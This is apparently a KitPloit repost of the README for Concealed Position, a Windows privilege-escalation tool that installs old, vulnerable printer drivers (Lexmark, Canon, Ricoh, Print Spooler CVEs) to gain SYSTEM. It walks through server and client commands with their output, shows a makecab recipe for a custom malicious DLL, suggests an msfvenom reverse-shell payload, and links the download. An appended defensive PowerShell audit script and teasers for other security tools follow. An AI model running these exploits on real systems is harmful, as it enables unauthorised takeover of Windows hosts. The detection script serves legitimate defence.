
Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="168" data-original-width="300" height="358" src="https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/w640-h358/printer_hack.jpeg" width="640" /></a></div> <p>Concealed Position is a local <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="blank" title="privilege escalation">privilege escalation</a> attack against Windows built on the idea of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the <em>as designed</em> Package Point and Print logic in Windows, which allows a low-privilege user to stage and install printer drivers. CP deliberately installs driver versions with <a href="https://www.kitploit.com/search/label/Known%20Vulnerabilities" target="blank" title="known vulnerabilities">known vulnerabilities</a>, which are then exploited to escalate to SYSTEM.
Concealed Position was first presented at DEF CON 29.</p><br /><span style="font-size: large;"><b>What exploits are available</b></span><br /> <p>Concealed Position offers four exploits, all with equally dumb names:</p> <ul> <li>ACIDDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-35449" rel="nofollow" target="blank" title="CVE-2021-35449">CVE-2021-35449</a> - Lexmark Universal Print Driver LPE</li> <li>RADIANTDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-38085" rel="nofollow" target="blank" title="CVE-2021-38085">CVE-2021-38085</a> - Canon TR150 Print Driver LPE</li> <li>POISONDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19363" rel="nofollow" target="blank" title="CVE-2019-19363">CVE-2019-19363</a> - Ricoh PCL6 Print Driver LPE</li> <li>SLASHINGDAMAGE - <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1300" rel="nofollow" target="blank" title="CVE-2020-1300">CVE-2020-1300</a> - Windows Print Spooler LPE</li> </ul> <p>The exploits are neat because, SLASHINGDAMAGE aside, they keep working after the vendor has patched the driver: the client installs the old, vulnerable driver version, and the only mechanism Windows has to stop users from installing an old driver is to revoke the driver's signing certificate, something that is not(?) historically done.</p> <br /><span style="font-size: large;"><b>But which exploit should I use?!</b></span><br /> <p>Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL), so they are less reliable, and SLASHINGDAMAGE, hopefully, is patched most everywhere.</p> <br /><span style="font-size: large;"><b>How does it work?</b></span><br /> <p>Concealed Position has two parts: an evil printer (<code>cp_server</code>) and a client (<code>cp_client</code>). The client reaches out to the evil printer, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy!
In Windows print API terms, the attack goes something like this:</p> <pre><code>Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Step 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Step 3: Add a local printer (exploitation stage)
client: Add printer
</code></pre> <p>It is important to note that SLASHINGDAMAGE doesn't actually work like that. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEF CON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server, as confusing as that may be.</p> <br /><span style="font-size: large;"><b>Is this a Windows vulnerability?</b></span><br /> <p>Arguably, yes. The driver store is a <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store" rel="nofollow" target="blank" title="trusted collection of … third-party driver packages">"trusted collection of … third-party driver packages"</a> that requires administrator access to modify. Using <code>GetPrinterDriver</code>, a low-privileged attacker can stage arbitrary drivers into the store.
This, to me, crosses a clear security boundary.</p> <p>Microsoft seemed to agree when they issued <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481" rel="nofollow" target="blank" title="CVE-2021-34481">CVE-2021-34481</a>.</p> <p>Although… it's arguable that this is simply a feature of the system and not a <a href="https://www.kitploit.com/search/label/Vulnerability" target="blank" title="vulnerability">vulnerability</a> at all. It really doesn't matter all that much: an attacker can escalate to SYSTEM on standard Windows installs.</p> <br /><span style="font-size: large;"><b>Which versions of Windows are affected by CVE-2021-34481?</b></span><br /> <p>At least Windows 8.1 and above.</p> <br /><span style="font-size: large;"><b>How do I use these tools?</b></span><br /> <p>Simple! So simple there will be many paragraphs to describe it!</p> <br /><b>CP Server</b><br /> <p>First, let's look at cp_server's command line options:</p> <pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
(ASCII-art "CONCEALED POSITION server!" banner omitted)

CLI options:
  -h, --help                     Display the help message
  -e, --exploit arg              The exploit to use
  -c, --cabs arg (=.\cab_files)  The location of the cabinet files

Exploits available:
  ACIDDAMAGE
  POISONDAMAGE
  RADIANTDAMAGE
  SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
</code></pre> <p>Above you can see the server takes two options:</p> <ol> <li>The exploit to configure the printer for</li> <li>A path to this repository's cab_files directory (.\cab_files\ is the default)</li> </ol> <p>For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver.
Just do this:</p> <pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
(ASCII-art "CONCEALED POSITION server!" banner omitted)

[+] Creating temporary space…
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
</code></pre> <p>And that's it, you'll see a new printer on your system:</p> <pre><code>PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                          ComputerName Type  DriverName              PortName      Shared Published
----                          ------------ ----  ----------              --------      ------ ---------
ACIDDAMAGE                                 Local Lexmark Universal v2    LPT1:         True   False
CutePDF Writer                             Local CutePDF Writer v4.0     CPW4:         False  False
OneNote for Windows 10                     Local Microsoft Software Pri… Microsoft.Of… False  False
Microsoft XPS Document Writer              Local Microsoft XPS Document… PORTPROMPT:   False  False
Microsoft Print to PDF                     Local Microsoft Print To PDF  PORTPROMPT:   False  False
Fax                                        Local Microsoft Shared Fax D… SHRFAX:       False  False

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
</code></pre> <p>Note that there is one manual step that <code>cp_server</code> prompts you to do.
Because I'm a junk hacker, I couldn't figure out how to programmatically set "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!</p> <p>The process for using <code>SLASHINGDAMAGE</code> is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server, and <em>then</em> you'll still need to follow a couple of manual steps and reboot.</p> <br /><b>CP Client</b><br /> <p>The client is similarly easy to use. Let's look at its command line options:</p> <pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
(ASCII-art "CONCEALED POSITION client!" banner omitted)

CLI options:
  -h, --help         Display the help message
  -r, --rhost arg    The remote evil printer address
  -n, --name arg     The remote evil printer name
  -e, --exploit arg  The exploit to use
  -l, --local        No remote printer. Local attack only.
  -d, --dll arg      Path to user provided DLL to execute.

Exploits available:
  ACIDDAMAGE
  POISONDAMAGE
  RADIANTDAMAGE
</code></pre> <p>First, I'd like to address the --dll option. The client has an embedded payload that simply writes the file C:\result.txt, which is how you confirm the payload ran. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.</p> <p><code>cp_client</code> has two modes: remote and local.
The remote option is the most interesting because it adds the <a href="https://www.kitploit.com/search/label/Vulnerable%20Driver" target="blank" title="vulnerable driver">vulnerable driver</a> to the driver store (thus exercising the bring-your-own-print-driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:</p> <ol> <li>The exploit I want to use</li> <li>The evil printer IP address</li> <li>The name of the evil shared printer</li> </ol> <p>Like this!</p> <pre><code>C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
(ASCII-art "CONCEALED POSITION client!" banner omitted)

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!
</code></pre> <p>That's it!
To execute a local-only attack, you just need to provide the exploit. Local mode skips the evil printer entirely, so it only works when the vulnerable driver is already present on the target, which is what the first line of output checks:</p> <pre><code>C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
(ASCII-art "CONCEALED POSITION client!" banner omitted)

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>
</code></pre> <br /><span style="font-size: large;"><b>Why doesn't the client have a SLASHINGDAMAGE option?</b></span><br /> <p><code>SLASHINGDAMAGE</code> doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy.
Something like this:</p> <pre><code>echo "evil.dll" "../../evil.dll" > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab
</code></pre> <p>It's probably important to know that the version of <code>SLASHINGDAMAGE</code> in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.</p> <br /><span style="font-size: large;"><b>Pull Requests and Bugs</b></span><br /> <p>Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.</p> <br /><span style="font-size: large;"><b>Other things</b></span><br /> <p>One thing to note is that the inject_me DLL is actually embedded in cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use <code>xxd -i</code> to generate the array).</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/jacob-baines/concealed_position" rel="nofollow" target="_blank" title="Download Concealed_Position">Download Concealed_Position</a></span></b></div>
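<p>As an added defender-side example (my own script, not part of the Concealed Position repository), the PowerShell below audits a host for the conditions the three-step flow above depends on and for the artifacts the tool output shows. It reads the Point and Print policy values Microsoft documented for CVE-2021-34481 (RestrictDriverInstallationToAdministrators, the NoWarningNoElevationOnInstall and UpdatePromptSettings values, and the Package Point and Print approved-server list), flags installed drivers from the three vendor families used by ACIDDAMAGE, RADIANTDAMAGE and POISONDAMAGE, looks for the on-disk artifacts named in the output above and in the SLASHINGDAMAGE note, and pulls driver-install events (ID 316) from the PrintService/Operational log. The registry value names and the event ID are as Microsoft documents them to my knowledge and should be confirmed against your own build; the driver name patterns and artifact paths are assumptions taken from this README's output. Run it in an elevated PowerShell session.</p>

```powershell
# Added audit script (not part of the Concealed Position repository).
# Checks a Windows host for the conditions cp_client relies on and for the
# artifacts its output shows. Run in an elevated PowerShell session.
# ASSUMPTIONS: registry value names are the Point and Print policy values
# Microsoft documented for CVE-2021-34481 (KB5005652); event ID 316 is the
# PrintService "printer driver ... was added or updated" event; the driver
# name patterns and artifact paths are taken from the README output above.

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Point and Print policy. cp_client needs a standard user to be able to stage and
#    install a driver package. After KB5005652 Windows restricts that to administrators
#    unless RestrictDriverInstallationToAdministrators is explicitly set to 0.
$pnpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$pnp = Get-ItemProperty -Path $pnpKey -ErrorAction SilentlyContinue
if ($pnp -and $pnp.RestrictDriverInstallationToAdministrators -eq 0) {
    $findings.Add('RestrictDriverInstallationToAdministrators = 0: non-admins may install print drivers')
}
foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
    if ($pnp -and $pnp.$name -ge 1) {
        $findings.Add("$name = $($pnp.$name): Point and Print warning/elevation prompts are suppressed")
    }
}
# Package Point and Print approved servers: without a list, any host (such as the
# evil printer at 10.0.0.9 in the walkthrough) may serve a driver package.
$pppKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint'
$ppp = Get-ItemProperty -Path $pppKey -ErrorAction SilentlyContinue
if (-not $ppp -or $ppp.PackagePointAndPrintServerList -ne 1) {
    $findings.Add('No approved Package Point and Print server list: any server may supply a driver package')
}

# 2. Installed drivers from the families the README exploits. Presence alone is not
#    proof of compromise (they are legitimate drivers); the old versions are what CP installs.
$driverPatterns = '*Lexmark Universal v2*', '*Canon TR150*', '*RICOH*PCL6*'
foreach ($drv in Get-PrinterDriver) {
    foreach ($pat in $driverPatterns) {
        if ($drv.Name -like $pat) {
            $findings.Add("Driver '$($drv.Name)' version $($drv.DriverVersion) is installed ($($drv.InfPath))")
        }
    }
}

# 3. Artifacts from the tool output above and from the SLASHINGDAMAGE description.
#    The Lexmark ProgramData directory is also created by a legitimate install, so
#    correlate it with the other findings rather than treating it as a verdict.
$artifacts = @(
    'C:\ProgramData\Lexmark Universal v2',
    'C:\result.txt',
    (Join-Path $env:SystemRoot 'System32\ualapi.dll')
)
foreach ($path in $artifacts) {
    if (Test-Path -LiteralPath $path) { $findings.Add("Artifact present: $path") }
}
if (Test-Path -LiteralPath 'C:\tmp') {
    Get-ChildItem -LiteralPath 'C:\tmp' -Filter *.dll -ErrorAction SilentlyContinue |
        ForEach-Object { $findings.Add("DLL staged in C:\tmp: $($_.FullName)") }
}

# 4. Driver installs recorded by the spooler. The Operational log is off by default,
#    so the first thing to establish is whether there is any evidence at all.
$logName = 'Microsoft-Windows-PrintService/Operational'
$log = Get-WinEvent -ListLog $logName -ErrorAction SilentlyContinue
if (-not $log -or -not $log.IsEnabled) {
    $findings.Add("$logName is disabled; enable it with: wevtutil sl $logName /e:true")
} else {
    Get-WinEvent -FilterHashtable @{ LogName = $logName; Id = 316 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $msg = $_.Message
            foreach ($pat in $driverPatterns) {
                if ($msg -like $pat) {
                    $findings.Add("$($_.TimeCreated) event 316: $($msg.Split("`n")[0])")
                }
            }
        }
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings | ForEach-Object { "[!] $_" } }
```

<p>The policy checks are the part worth automating across a fleet: a host where RestrictDriverInstallationToAdministrators is 0 and no approved-server list exists is exactly the configuration the remote mode above needs. The event check only helps if the Operational log was already enabled before the install happened, so enabling it is a prerequisite, not a response step.</p>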

kitploit

Related news

PoW-Shield - Project Dedicated To Fight DDoS And Spam With Proof Of Work, Featuring An Additional WA

<p><a href="http://2.bp.blogspot.com/-RfSp1Prm8Ns/YUOxaTgLFfI/AAAAAAAAvAE/SN4RCzdEi0Y5JMgSOfk7QtJ4oTb9HJ_hACK4BGAYYCw/s1600/PoW-Shield_7_screenshot-773941.jpeg" style="text-align: center;"><img alt="" border="0" height="290" id="BLOGGER_PHOTO_ID_7008640510588556786" src="http://2.bp.blogspot.com/-RfSp1Prm8Ns/YUOxaTgLFfI/AAAAAAAAvAE/SN4RCzdEi0Y5JMgSOfk7QtJ4oTb9HJ_hACK4BGAYYCw/w640-h290/PoW-Shield_7_screenshot-773941.jpeg" width="640" /></a></p><p><br /></p> <p>Project dedicated to provide DDoS <a href="https://www.kitploit.com/search/label/Protection" target="_blank" title="protection">protection</a> with proof-of-work</p><span><a name='more'></a></span><p style="text-align: center;"><br /></p><span style="font-size: large;"><b>Description</b></span><br /> <p>PoW Shield provides DDoS protection on OSI application layer by acting as a proxy that utilizes proof of work between the backend service and the end user. This project aims to provide an alternative to general captcha methods su...

JSPanda - Client-Side Prototype Pullution Vulnerability Scanner

<p style="text-align: center;"><a href="https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/s1099/jspanda_3_pollute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="844" data-original-width="1099" height="492" src="https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>JSpanda is client-side prototype pollution <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code.</p> <p>However, JSpanda cannot detect advanced prototype pollution vulnerabilities.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b><stron...

AES256_Passwd_Store - Secure Open-Source Password Manager

<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tGjIlM9LBZc/YUqO4Rh9sPI/AAAAAAAAvRs/bm1bfExG9XAPtJE5eSPbA7TGazin3GVsACNcBGAsYHQ/s741/secure_password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="741" height="308" src="https://1.bp.blogspot.com/-tGjIlM9LBZc/YUqO4Rh9sPI/AAAAAAAAvRs/bm1bfExG9XAPtJE5eSPbA7TGazin3GVsACNcBGAsYHQ/w640-h308/secure_password.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p> <p>This script securely encrypts or decrypts <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> on disk within a custom database file. It also features functionality to retrieve passwords from a previously generated database file. This script takes a master password from stdin/from memory, then <a href="https://www.kitploit.com/search/...

DirSearch - A Go Implementation Of Dirsearch

<p style="text-align: center;"><a href="http://1.bp.blogspot.com/-Eb1ngQXSYFs/YUOxfKGrtdI/AAAAAAAAvAM/kvv1AGXrZ64I7ehBqzTL1k0IlVJF16HWQCK4BGAYYCw/s1600/dirsearch_1_babygopher-badge-790842.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7008640593965069778" src="http://1.bp.blogspot.com/-Eb1ngQXSYFs/YUOxfKGrtdI/AAAAAAAAvAM/kvv1AGXrZ64I7ehBqzTL1k0IlVJF16HWQCK4BGAYYCw/s320/dirsearch_1_babygopher-badge-790842.png" /></a></p><br /> <p>This software is a Go implementation of the original <a href="https://github.com/maurosoria/dirsearch" rel="nofollow" target="_blank" title="dirsearch tool">dirsearch tool</a> written by <code>Mauro Soria</code>. DirSearch is the very first tool I write in Go, mostly to play and experiment with Go's concurrency model, channels, and so forth :)</p><p><span></span></p><a name='more'></a>&nbsp;<p></p><span style="font-size: large;"><b>Purpose</b></span><br /> <p>DirSearch takes an input URL ( <code>-url</code> parameter ) and a wordlist ( <code>-wordlist</cod...

PyHook - An Offensive API Hooking Tool Written In Python Designed To Catch Various Credentials Within The API Call

<p><a href="http://3.bp.blogspot.com/-w1TWIH0VmMU/YTVKoFtzVYI/AAAAAAAAt1U/Rc1XoXgIzw0KwG4SRi4foI0Aq9_Lm0x_wCK4BGAYYCw/s1600/PyHook_1_Demo-754513.gif" style="text-align: center;"><img alt="" border="0" height="328" id="BLOGGER_PHOTO_ID_7004586848034182530" src="http://3.bp.blogspot.com/-w1TWIH0VmMU/YTVKoFtzVYI/AAAAAAAAt1U/Rc1XoXgIzw0KwG4SRi4foI0Aq9_Lm0x_wCK4BGAYYCw/w640-h328/PyHook_1_Demo-754513.gif" width="640" /></a></p><br /> <p>PyHook is the python implementation of my <a href="https://github.com/IlanKalendarov/SharpHook" rel="nofollow" target="_blank" title="SharpHook">SharpHook</a> project, It uses various API hooks in order to give us the desired credentials.</p> <p>PyHook Uses <a href="https://www.kitploit.com/search/label/Frida" target="_blank" title="frida">frida</a> to inject it's dependencies into the target process</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Supported Processes</b></span><br /> <table> <tr> <th>Process</th> <th>A...

MailRipV2 - Improved SMTP Checker / SMTP Cracker With Proxy-Support, Inbox Test And Many More Features

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-TlTrewoCKCE/YUOfTfW4GvI/AAAAAAAAuwI/7AugxQAOxzIaT7YBQ-1D-MXde7jBohv4QCNcBGAsYHQ/s663/Mail.Rip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="575" data-original-width="663" height="556" src="https://1.bp.blogspot.com/-TlTrewoCKCE/YUOfTfW4GvI/AAAAAAAAuwI/7AugxQAOxzIaT7YBQ-1D-MXde7jBohv4QCNcBGAsYHQ/w640-h556/Mail.Rip.png" width="640" /></a></div><p><br /></p> <p> Your SMTP checker / SMTP cracker for mailpass combolists including features like: proxy-support (SOCKS4 / SOCKS5) with automatic proxy-scraper and checker, e-mail delivery / inbox check and DNS lookup for unknown SMTP-hosts. Made for easy usage and always working!</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Overview</b></span><br /> <br /><b>Legal Notices</b><br /> <p> <b>You are ONLY allowed to use the following ...

Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-h0VI37sR9_k/YUqNP3yhHHI/AAAAAAAAvRY/YEfOeO7sMlEHVNzTe5DeRVQ8dm0DnEf6ACNcBGAsYHQ/s1851/weakpass_1_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="939" data-original-width="1851" height="324" src="https://1.bp.blogspot.com/-h0VI37sR9_k/YUqNP3yhHHI/AAAAAAAAvRY/YEfOeO7sMlEHVNzTe5DeRVQ8dm0DnEf6ACNcBGAsYHQ/w640-h324/weakpass_1_sample.png" width="640" /></a></div><p><br /></p><p>The tool generates a <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> based on a set of words entered by the user.</p><span><a name='more'></a></span><p><br /></p><p>For example, during penetration testing, you need to gain access to some service, device, account, or Wi-Fi network that is password protected. For example, let it be the <em>Wi-Fi</em> network of <strong>EvilCorp</strong>. Sometimes, a passw...

CrowdSec - An Open-Source Massively Multiplayer Firewall Able To Analyze Visitor Behavior And Provide An Adapted Response To All Kinds Of Attacks

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-M_M-0bf6M28/YUOdpCkjs4I/AAAAAAAAuwA/voMYX-s0vSkdD7d3_EoPvBC-EF93luWFQCNcBGAsYHQ/s2048/crowdsec_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1383" data-original-width="2048" height="432" src="https://1.bp.blogspot.com/-M_M-0bf6M28/YUOdpCkjs4I/AAAAAAAAuwA/voMYX-s0vSkdD7d3_EoPvBC-EF93luWFQCNcBGAsYHQ/w640-h432/crowdsec_logo.png" width="640" /></a></div><p><br /></p> <p>CrowdSec is a free, modern &amp; collaborative behavior detection engine, coupled with a global IP reputation network. It builds on fail2ban's philosophy but is IPv6 compatible and 60x faster (Go vs Python), uses Grok patterns to parse logs and YAML scenarios to identify behaviors. CrowdSec is engineered for modern Cloud / <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="Containers">Containers</a> / VM based infrastructures (by dec...

PS2EXE - Module To Compile Powershell Scripts To Executables

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_KxV4jubhaU/YUOcgzhpbJI/AAAAAAAAuvw/Sc0xmixjtXoKF7G1bAmJ0ibxfmIDEAIxwCNcBGAsYHQ/s873/PS2EXE.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="873" height="280" src="https://1.bp.blogspot.com/-_KxV4jubhaU/YUOcgzhpbJI/AAAAAAAAuvw/Sc0xmixjtXoKF7G1bAmJ0ibxfmIDEAIxwCNcBGAsYHQ/w640-h280/PS2EXE.JPG" width="640" /></a></div><p><br /></p> <p>Rework of Ingo Karstein's great script with GUI support. GUI output and input are activated with one switch, and real Windows executables are generated. With PowerShell 5.x support and a graphical front end.</p> <p>Module version.</p><span><a name='more'></a></span><p><br /></p> <p>You find the script-based version here (<a href="https://github.com/MScholtes/TechNet-Gallery" rel="nofollow" target="_blank" title="https://github.com/MScholtes/TechNet-Gallery">https://githu...

InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-CwR1NpKuyd4/YUObnj1bvzI/AAAAAAAAuvo/jTm7kjPutFA9rMwYWJtmittz4F4lid6LgCNcBGAsYHQ/s930/InlineExecute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="606" data-original-width="930" height="418" src="https://1.bp.blogspot.com/-CwR1NpKuyd4/YUObnj1bvzI/AAAAAAAAuvo/jTm7kjPutFA9rMwYWJtmittz4F4lid6LgCNcBGAsYHQ/w640-h418/InlineExecute.png" width="640" /></a></div><p><br /></p> <p>InlineExecute-Assembly is a <a href="https://www.kitploit.com/search/label/Proof%20Of%20Concept" target="_blank" title="proof of concept">proof of concept</a> Beacon Object File (BOF) that allows security professionals to perform in-process .NET assembly execution as an alternative to Cobalt Strike's traditional fork-and-run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of <code>Main(string[] args)</code> or <code>Mai...

BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4w-yAJHKJ4Q/YUOMKJAmDwI/AAAAAAAAuuY/2Tqomqypu58DXaQApHuQiwhXEcC7q17ZgCNcBGAsYHQ/s800/graphql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="800" height="224" src="https://1.bp.blogspot.com/-4w-yAJHKJ4Q/YUOMKJAmDwI/AAAAAAAAuuY/2Tqomqypu58DXaQApHuQiwhXEcC7q17ZgCNcBGAsYHQ/w640-h224/graphql.png" width="640" /></a></div><p><br /></p> <p>BatchQL is a GraphQL security <a href="https://www.kitploit.com/search/label/Auditing" target="_blank" title="auditing">auditing</a> script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.</p> <p>When exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.</p> <p>GraphQL batching attacks can be...

On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AL7wzHH2D8c/YUS_XCCASFI/AAAAAAAAvRM/D6gLmBwGwvIW1uCOBSLNnmJ41hRXQbwNgCNcBGAsYHQ/s480/on-the-fly_4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="480" height="480" src="https://1.bp.blogspot.com/-AL7wzHH2D8c/YUS_XCCASFI/AAAAAAAAvRM/D6gLmBwGwvIW1uCOBSLNnmJ41hRXQbwNgCNcBGAsYHQ/w640-h480/on-the-fly_4.jpeg" width="640" /></a></div><p><br /></p><div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" ▒█████ ███▄ █ ▄▄▄█████▓ ██░ ██ ▓█████ █████ ██▓ ▓██ ██▓ ▒██▒ ██▒ ██ ▀█ █ ▓ ██▒ ▓▒▒▓██░ ██ ▓█ ▀ ▓██ ▓██▒ ▒██ ██▒ ▒██░ ██▒▓██ ▀█ ██▒ ▒ ▓██░ ▒░░▒██▀▀██ ▒███ ▒████ ▒██░ ▒██ ██░ ▒██ ██░▓██▒ ▐▌██▒ ░ ▓██▓ ░ ░▓█ ░██ ▒▓█ ▄ ░▓█▒ ▒██░ ░ ▐██▓░ ░ ████▓▒░▒██░ ▓██░ ▒██▒ ░ ░▓█▒░██▓▒░▒████ ▒░▒█░ ▒░██...

Plution - Prototype Pollution Scanner Using Headless Chrome

